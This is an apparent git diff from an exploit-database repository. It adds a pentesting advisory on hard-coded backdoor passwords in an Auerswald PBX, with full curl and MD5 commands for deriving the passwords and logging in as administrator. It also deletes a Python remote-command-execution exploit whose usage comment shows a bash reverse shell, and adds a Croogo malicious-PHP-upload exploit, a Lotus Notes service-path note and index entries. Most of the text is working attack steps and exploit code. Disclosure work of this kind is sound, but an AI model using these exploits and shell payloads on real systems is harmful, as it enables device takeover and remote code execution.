+rootfs: Linux rev 1.0 ext2 filesystem data, UUID=c3604712-a2ca-412f-81ca-
+f302d7f20ef1, volume name "7.8A_002_125850."
+
+$ sudo mount -o loop,ro rootfs /mnt
+
+$ cat /mnt/etc/passwd
+root::0:0:root:/root:/bin/sh
+netstorage::1:1::/data/ftpd:/bin/false
+web::2:2::/opt/auerswald/lighttpd:/bin/false
+------------------------------------------------------------------------
+
+The PBX runs the web server lighttpd[3], the configuration files can be
+found in the folder "/opt/auerswald/lighttpd". The web server forwards
+most requests via FastCGI to the program "/opt/auerswald/web/webserver".
+This program can then be analysed, for example using the reverse
+engineering program Ghidra[4].
+
+The manual for the PBX reveals that in order to manage the device, users
+need to log in with the username "sub-admin". When this string is
+searched within the program in Ghidra, the function which checks
+passwords on login can be identified.
+
+It can easily be seen that besides the username "sub-admin" the function
+also checks for the hard-coded username "Schandelah", which is the
+village of Auerswald's headquarter. Further analysis revealed that the
+corresponding password for this username is derived by concatenating the
+PBX's serial number, the string "r2d2" and the current date, hashing it
+with the MD5 hash algorithm and taking the first seven lower-case hex
+chars of the result.
+
+All data needed to derive the password can be accessed without
+authentication by requesting the path "/about_state", which is also used
+on the website the PBX redirects users to who abort the password prompt
+(shortened and formatted to increase readability):
+
+------------------------------------------------------------------------
+$ curl --include https://192.168.1.2/about_state
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+[...]
+
+{
+ "pbx": "COMpact 5500R",
+ "pbxType": 35,
+ "pbxId": 0,
+ "version": "Version 7.8A - Build 002 ",
+ "serial": "1234123412",
+ "date": "30.08.2021",
+ [...]
+}
+------------------------------------------------------------------------
+
+The password can be derived as follows:
+
+------------------------------------------------------------------------
+$ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'
+1432d89
+------------------------------------------------------------------------
+
+This password can then be used for authentication:
+
+------------------------------------------------------------------------
+$ curl --include --user 'Schandelah:1432d89' --anyauth \
+ https://192.168.1.2/tree
+
+HTTP/1.1 302 Found
+Location: /statics/html/page_servicetools.html
+Set-Cookie: AUERSessionID1234123412=AXCTMGGCCUAGBSE; HttpOnly; Path=/
+[...]
+------------------------------------------------------------------------
+
+Next, the endpoint "/logstatus_state" can be queried using the returned
+session ID to check the access level:
+
+------------------------------------------------------------------------
+% curl --cookie 'AUERSessionID1234123412=AXCTMGGCCUAGBSE' --include \
+ https://192.168.1.2/logstatus_state
+
+HTTP/1.1 200 OK
+X-XSS-Protection: 1
+Content-Type: application/json; charset=utf-8;
+[...]
+
+{"logstatus":"Haendler"}
+------------------------------------------------------------------------
+
+The returned access level is "Haendler" (reseller). After login, the web
+server redirects to a special service page at the path
+"/statics/html/page_servicetools.html". Among other things, it allows to
+download a backup of all data on the device, configure audio recording
+and reset the password, PIN and token for the user "Admin". Accessing
+regular administrative functions is not possible directly with this user
+account.
+
+When inspecting the password checking function, a second backdoor can be
+found. When the username "Admin" is specified, the given password is
+tested against the configured password as well as a password derived in
+a similar way from the PBX's serial number, the string "r2d2", the
+current date and the configured language. The MD5 hash is taken and the
+specified password is tested against the first seven characters of the
+lower case hexadecimal hash.
+
+The backdoor password for the "Admin" user can be calculated as follows:
+
+------------------------------------------------------------------------
+$ echo -n 1234123412r2d230.08.2021DE | md5sum | egrep -o '^.{7}'
+92fcdd9
+------------------------------------------------------------------------
+
+The server returns a session ID for that password and the username
+"Admin":
+
+------------------------------------------------------------------------
+$ curl --user 'Admin:92fcdd9' --anyauth --include \
+ https://192.168.1.2/tree
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+Set-Cookie: AUERSessionID1234123412=MLJHCDLPMXPNKWY; HttpOnly; Path=/
+[...]
+
+[{"login":3,"userId":0,"userName":"",[...]}]
+------------------------------------------------------------------------
+
+Checking the access level of the session reveals the status
+"Administrator":
+
+------------------------------------------------------------------------
+$ curl --cookie 'AUERSessionID1234123412=MLJHCDLPMXPNKWY' --include \
+ https://192.168.1.2/logstatus_state
+
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=utf-8;
+[...]
+
+{"logstatus":"Administrator"}
+------------------------------------------------------------------------
+
+
+Workaround
+==========
+
+Disable or restrict access to the web-based management interface if
+possible.
+
+
+Fix
+===
+
+Upgrade to a firmware version which corrects this vulnerability.
+
+
+Security Risk
+=============
+
+By inspecting the firmware for the COMpact 5500R PBX, attackers can
+easily discover two backdoor passwords. One password is for the secret
+user account with the username "Schandelah", the other works as an
+alternative password for the user "Admin". Using the backdoor, attackers
+are granted access to the PBX with the highest privileges, enabling them
+to completely compromise the device. The passwords are derived from the
+serial number, the current date and the configured language.
+
+The backdoor passwords are not documented. They secretly coexist with a
+documented password recovery function supported by the vendor. No way
+was found to disable the backdoor access.
+
+All information needed to derive the passwords can be requested over the
+network without authentication, so attackers only require network access
+to the web-based management interface.
+
+Due to the ease of exploitation and severe consequences, the backdoor
+passwords are rated as a high risk.
+
+
+Timeline
+========
+
+2021-08-26 Vulnerability identified
+2021-09-01 Customer approved disclosure to vendor
+2021-09-10 Vendor notified
+2021-09-10 CVE ID requested
+2021-09-10 CVE ID assigned
+2021-10-05 Vendor provides access to device with fixed firmware
+2021-10-11 Vendor provides fixed firmware
+2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
+2021-12-06 Advisory published
+
+
+References
+==========
+
+[1] https://www.auerswald.de/de/support/download/firmware-compact-5500
+[2] https://www.denx.de/wiki/U-Boot
+[3] https://www.lighttpd.net
+[4] https://ghidra-sre.org
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
+https://www.redteam-pentesting.de/jobs/
+
+
+--
+RedTeam Pentesting GmbH Tel.: +49 241 510081-0
+Dennewartstr. 25-27 Fax : +49 241 510081-99
+52068 Aachen https://www.redteam-pentesting.de
+Germany Registergericht: Aachen HRB 14004
+Geschäftsführer: Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/exploits/php/webapps/50559.py b/exploits/php/webapps/50559.py
deleted file mode 100755
index 54f81c734..000000000
--- a/exploits/php/webapps/50559.py
+++ /dev/null
@@ -1,65 +0,0 @@
-# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)
-# Date: November 30, 2021
-# Exploit Author: Nicole Daniella Murillo Mejias
-# Version: Advanced Comment System 1.0
-# Tested on: Linux
-
-#!/usr/bin/env python3
-
-# DESCRIPTION:
-# Commands are Base64 encoded and sent via POST requests to the vulnerable application, the
-# response is filtered by the randomly generated alphanumeric string and only command output
-# is displayed.
-#
-# USAGE:
-# Execute the script and pass the command to execute as arguments, they can be quoted or unquoted
-# If any special characters are used, they should be quoted with single quotes.
-#
-# Example:
-#
-# python3 acspoc.py uname -a
-# python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'
-
-import sys
-import base64
-import requests
-import random
-
-def generate_string(size):
- str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
- return ''.join(random.choice(str) for i in range(size))
-
-def exploit(cmd):
-
- # TODO: Change the URL to the target host
- url = 'http://127.0.0.1/advanced_comment_system/index.php'
-
- headers = {'Content-Type': 'application/x-www-form-urlencoded'}
-
- encoded_cmd = base64.b64encode(cmd)
-
- delimiter = generate_string(6).encode()
-
- body = b'ACS_path=php://input%00&cbcmd='
- body += encoded_cmd
- body += b'&'
-
- try:
- result = requests.post(url=url, headers=headers, data=body)
- except KeyboardInterrupt:
- print("Keyboard interrupt detected.")
- sys.exit()
-
- if f'{delimiter.decode()}: ' in result.text:
- position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ")
-
- if len(result.text[position:]) > 0:
- print(result.text[position:])
- else:
- print(f"No output from command '{cmd.decode()}'")
- print(f"Response size from target host: {len(result.text)} bytes")
-
-if __name__ == "__main__":
- exploit(' '.join(sys.argv[1:]).encode())
\ No newline at end of file
diff --git a/exploits/php/webapps/50570.txt b/exploits/php/webapps/50570.txt
new file mode 100644
index 000000000..c34180807
--- /dev/null
+++ b/exploits/php/webapps/50570.txt
@@ -0,0 +1,72 @@
+# Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated)
+# Date: 05/12/2021
+# Exploit Author: Deha Berkin Bir
+# Vendor Homepage: https://croogo.org/
+# Software Link: https://downloads.croogo.org/v3.0.2.zip
+# Version: 3.0.2
+# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
+
+==> Tutorial <==
+
+1- Login with your privileged account.
+2- Go to the 'Attachments' section. Directory is '/admin/file-manager/attachments'.
+3- Click the 'New Attachment' button.
+4- Choose a malicious php script and upload it.
+
+########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT ####################
+$command";
+?>
+############################################################################
+
+5- Click on the URL of malicious php script you uploaded.
+6- The malicious PHP script will be executed.
+
+
+==> HTTP Request (File Upload) <==
+
+POST /admin/file-manager/attachments/add HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------7028631106888453201670373694
+Content-Length: 976
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)/admin/file-manager/attachments/add
+Cookie: csrfToken=bf693e75da3b8cfedb1e097485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb; CAKEPHP=do6gfdgwsl424dabvg1mqp9; GeniXCMS-pJSRyfdghoBRVTDlKhjklmkfhtkbup1r; PHPSESSID=gd59dfghhhg2n10amijq89hih
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------7028631106888453201670373694
+Content-Disposition: form-data; name="_method"
+
+POST
+-----------------------------7028631106888453201670373694
+Content-Disposition: form-data; name="_csrfToken"
+
+bf693ebed78cee03265197aed57e994e70d7qwdfq231341234dsfasdf2397485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb
+-----------------------------7028631106888453201670373694
+Content-Disposition: form-data; name="file"; filename="malicious.php"
+Content-Type: application/octet-stream
+
+$command";
+?>
+
+-----------------------------7028631106888453201670373694
+Content-Disposition: form-data; name="_Token[fields]"
+
+16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
+-----------------------------7028631106888453201670373694
+Content-Disposition: form-data; name="_Token[unlocked]"
+
+
+-----------------------------7028631106888453201670373694--
\ No newline at end of file
diff --git a/exploits/windows/local/50566.txt b/exploits/windows/local/50566.txt
new file mode 100644
index 000000000..8d7f83050
--- /dev/null
+++ b/exploits/windows/local/50566.txt
@@ -0,0 +1,28 @@
+# Exploit Title: HCL Lotus Notes V12- Unquoted Service Path
+# Exploit Author: Mert DAŞ
+# Version: V12
+# Date: 01/12/2021
+# Vendor Homepage: https://www.hcltechsw.com/domino/download
+# Tested on: Windows 10
+
+
+ProcessId : 3860
+Name : LNSUSvc
+DisplayName : HCL Notes Smart Upgrade Hizmeti
+PathName : c:\HCL\Notes\SUService.exe
+StartName : LocalSystem
+StartMode : Auto
+State : Running
+
+Discovery
+-------------------------
+C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 40fc72c29..553b1b86f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11422,6 +11422,7 @@ id,file,description,date,author,type,platform,port
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
+50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18571,6 +18572,10 @@ id,file,description,date,author,type,platform,port
50407,exploits/hardware/remote/50407.py,"Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)",1970-01-01,LiquidWorm,remote,hardware,
50408,exploits/hardware/remote/50408.txt,"Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection",1970-01-01,LiquidWorm,remote,hardware,
50539,exploits/linux/remote/50539.py,"GNU gdbserver 9.2 - Remote Command Execution (RCE)",1970-01-01,"Roberto Gesteira Miñarro",remote,linux,
+50565,exploits/hardware/remote/50565.txt,"Auerswald COMfortel 2.8F - Authentication Bypass",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
+50567,exploits/hardware/remote/50567.txt,"Auerswald COMpact 8.0B - Privilege Escalation",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
+50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
+50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44648,8 +44653,8 @@ id,file,description,date,author,type,platform,port
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
-50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,
50561,exploits/php/webapps/50561.txt,"Online Magazine Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
50562,exploits/php/webapps/50562.txt,"WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)",1970-01-01,"Mohamed Magdy Abumusilm",webapps,php,
50563,exploits/php/webapps/50563.txt,"WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Abdurrahman Erkan",webapps,php,
50564,exploits/php/webapps/50564.txt,"WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Uriel Yochpaz",webapps,php,
+50570,exploits/php/webapps/50570.txt,"Croogo 3.0.2 - Remote Code Execution (Authenticated)",1970-01-01,"Deha Berkin Bir",webapps,php,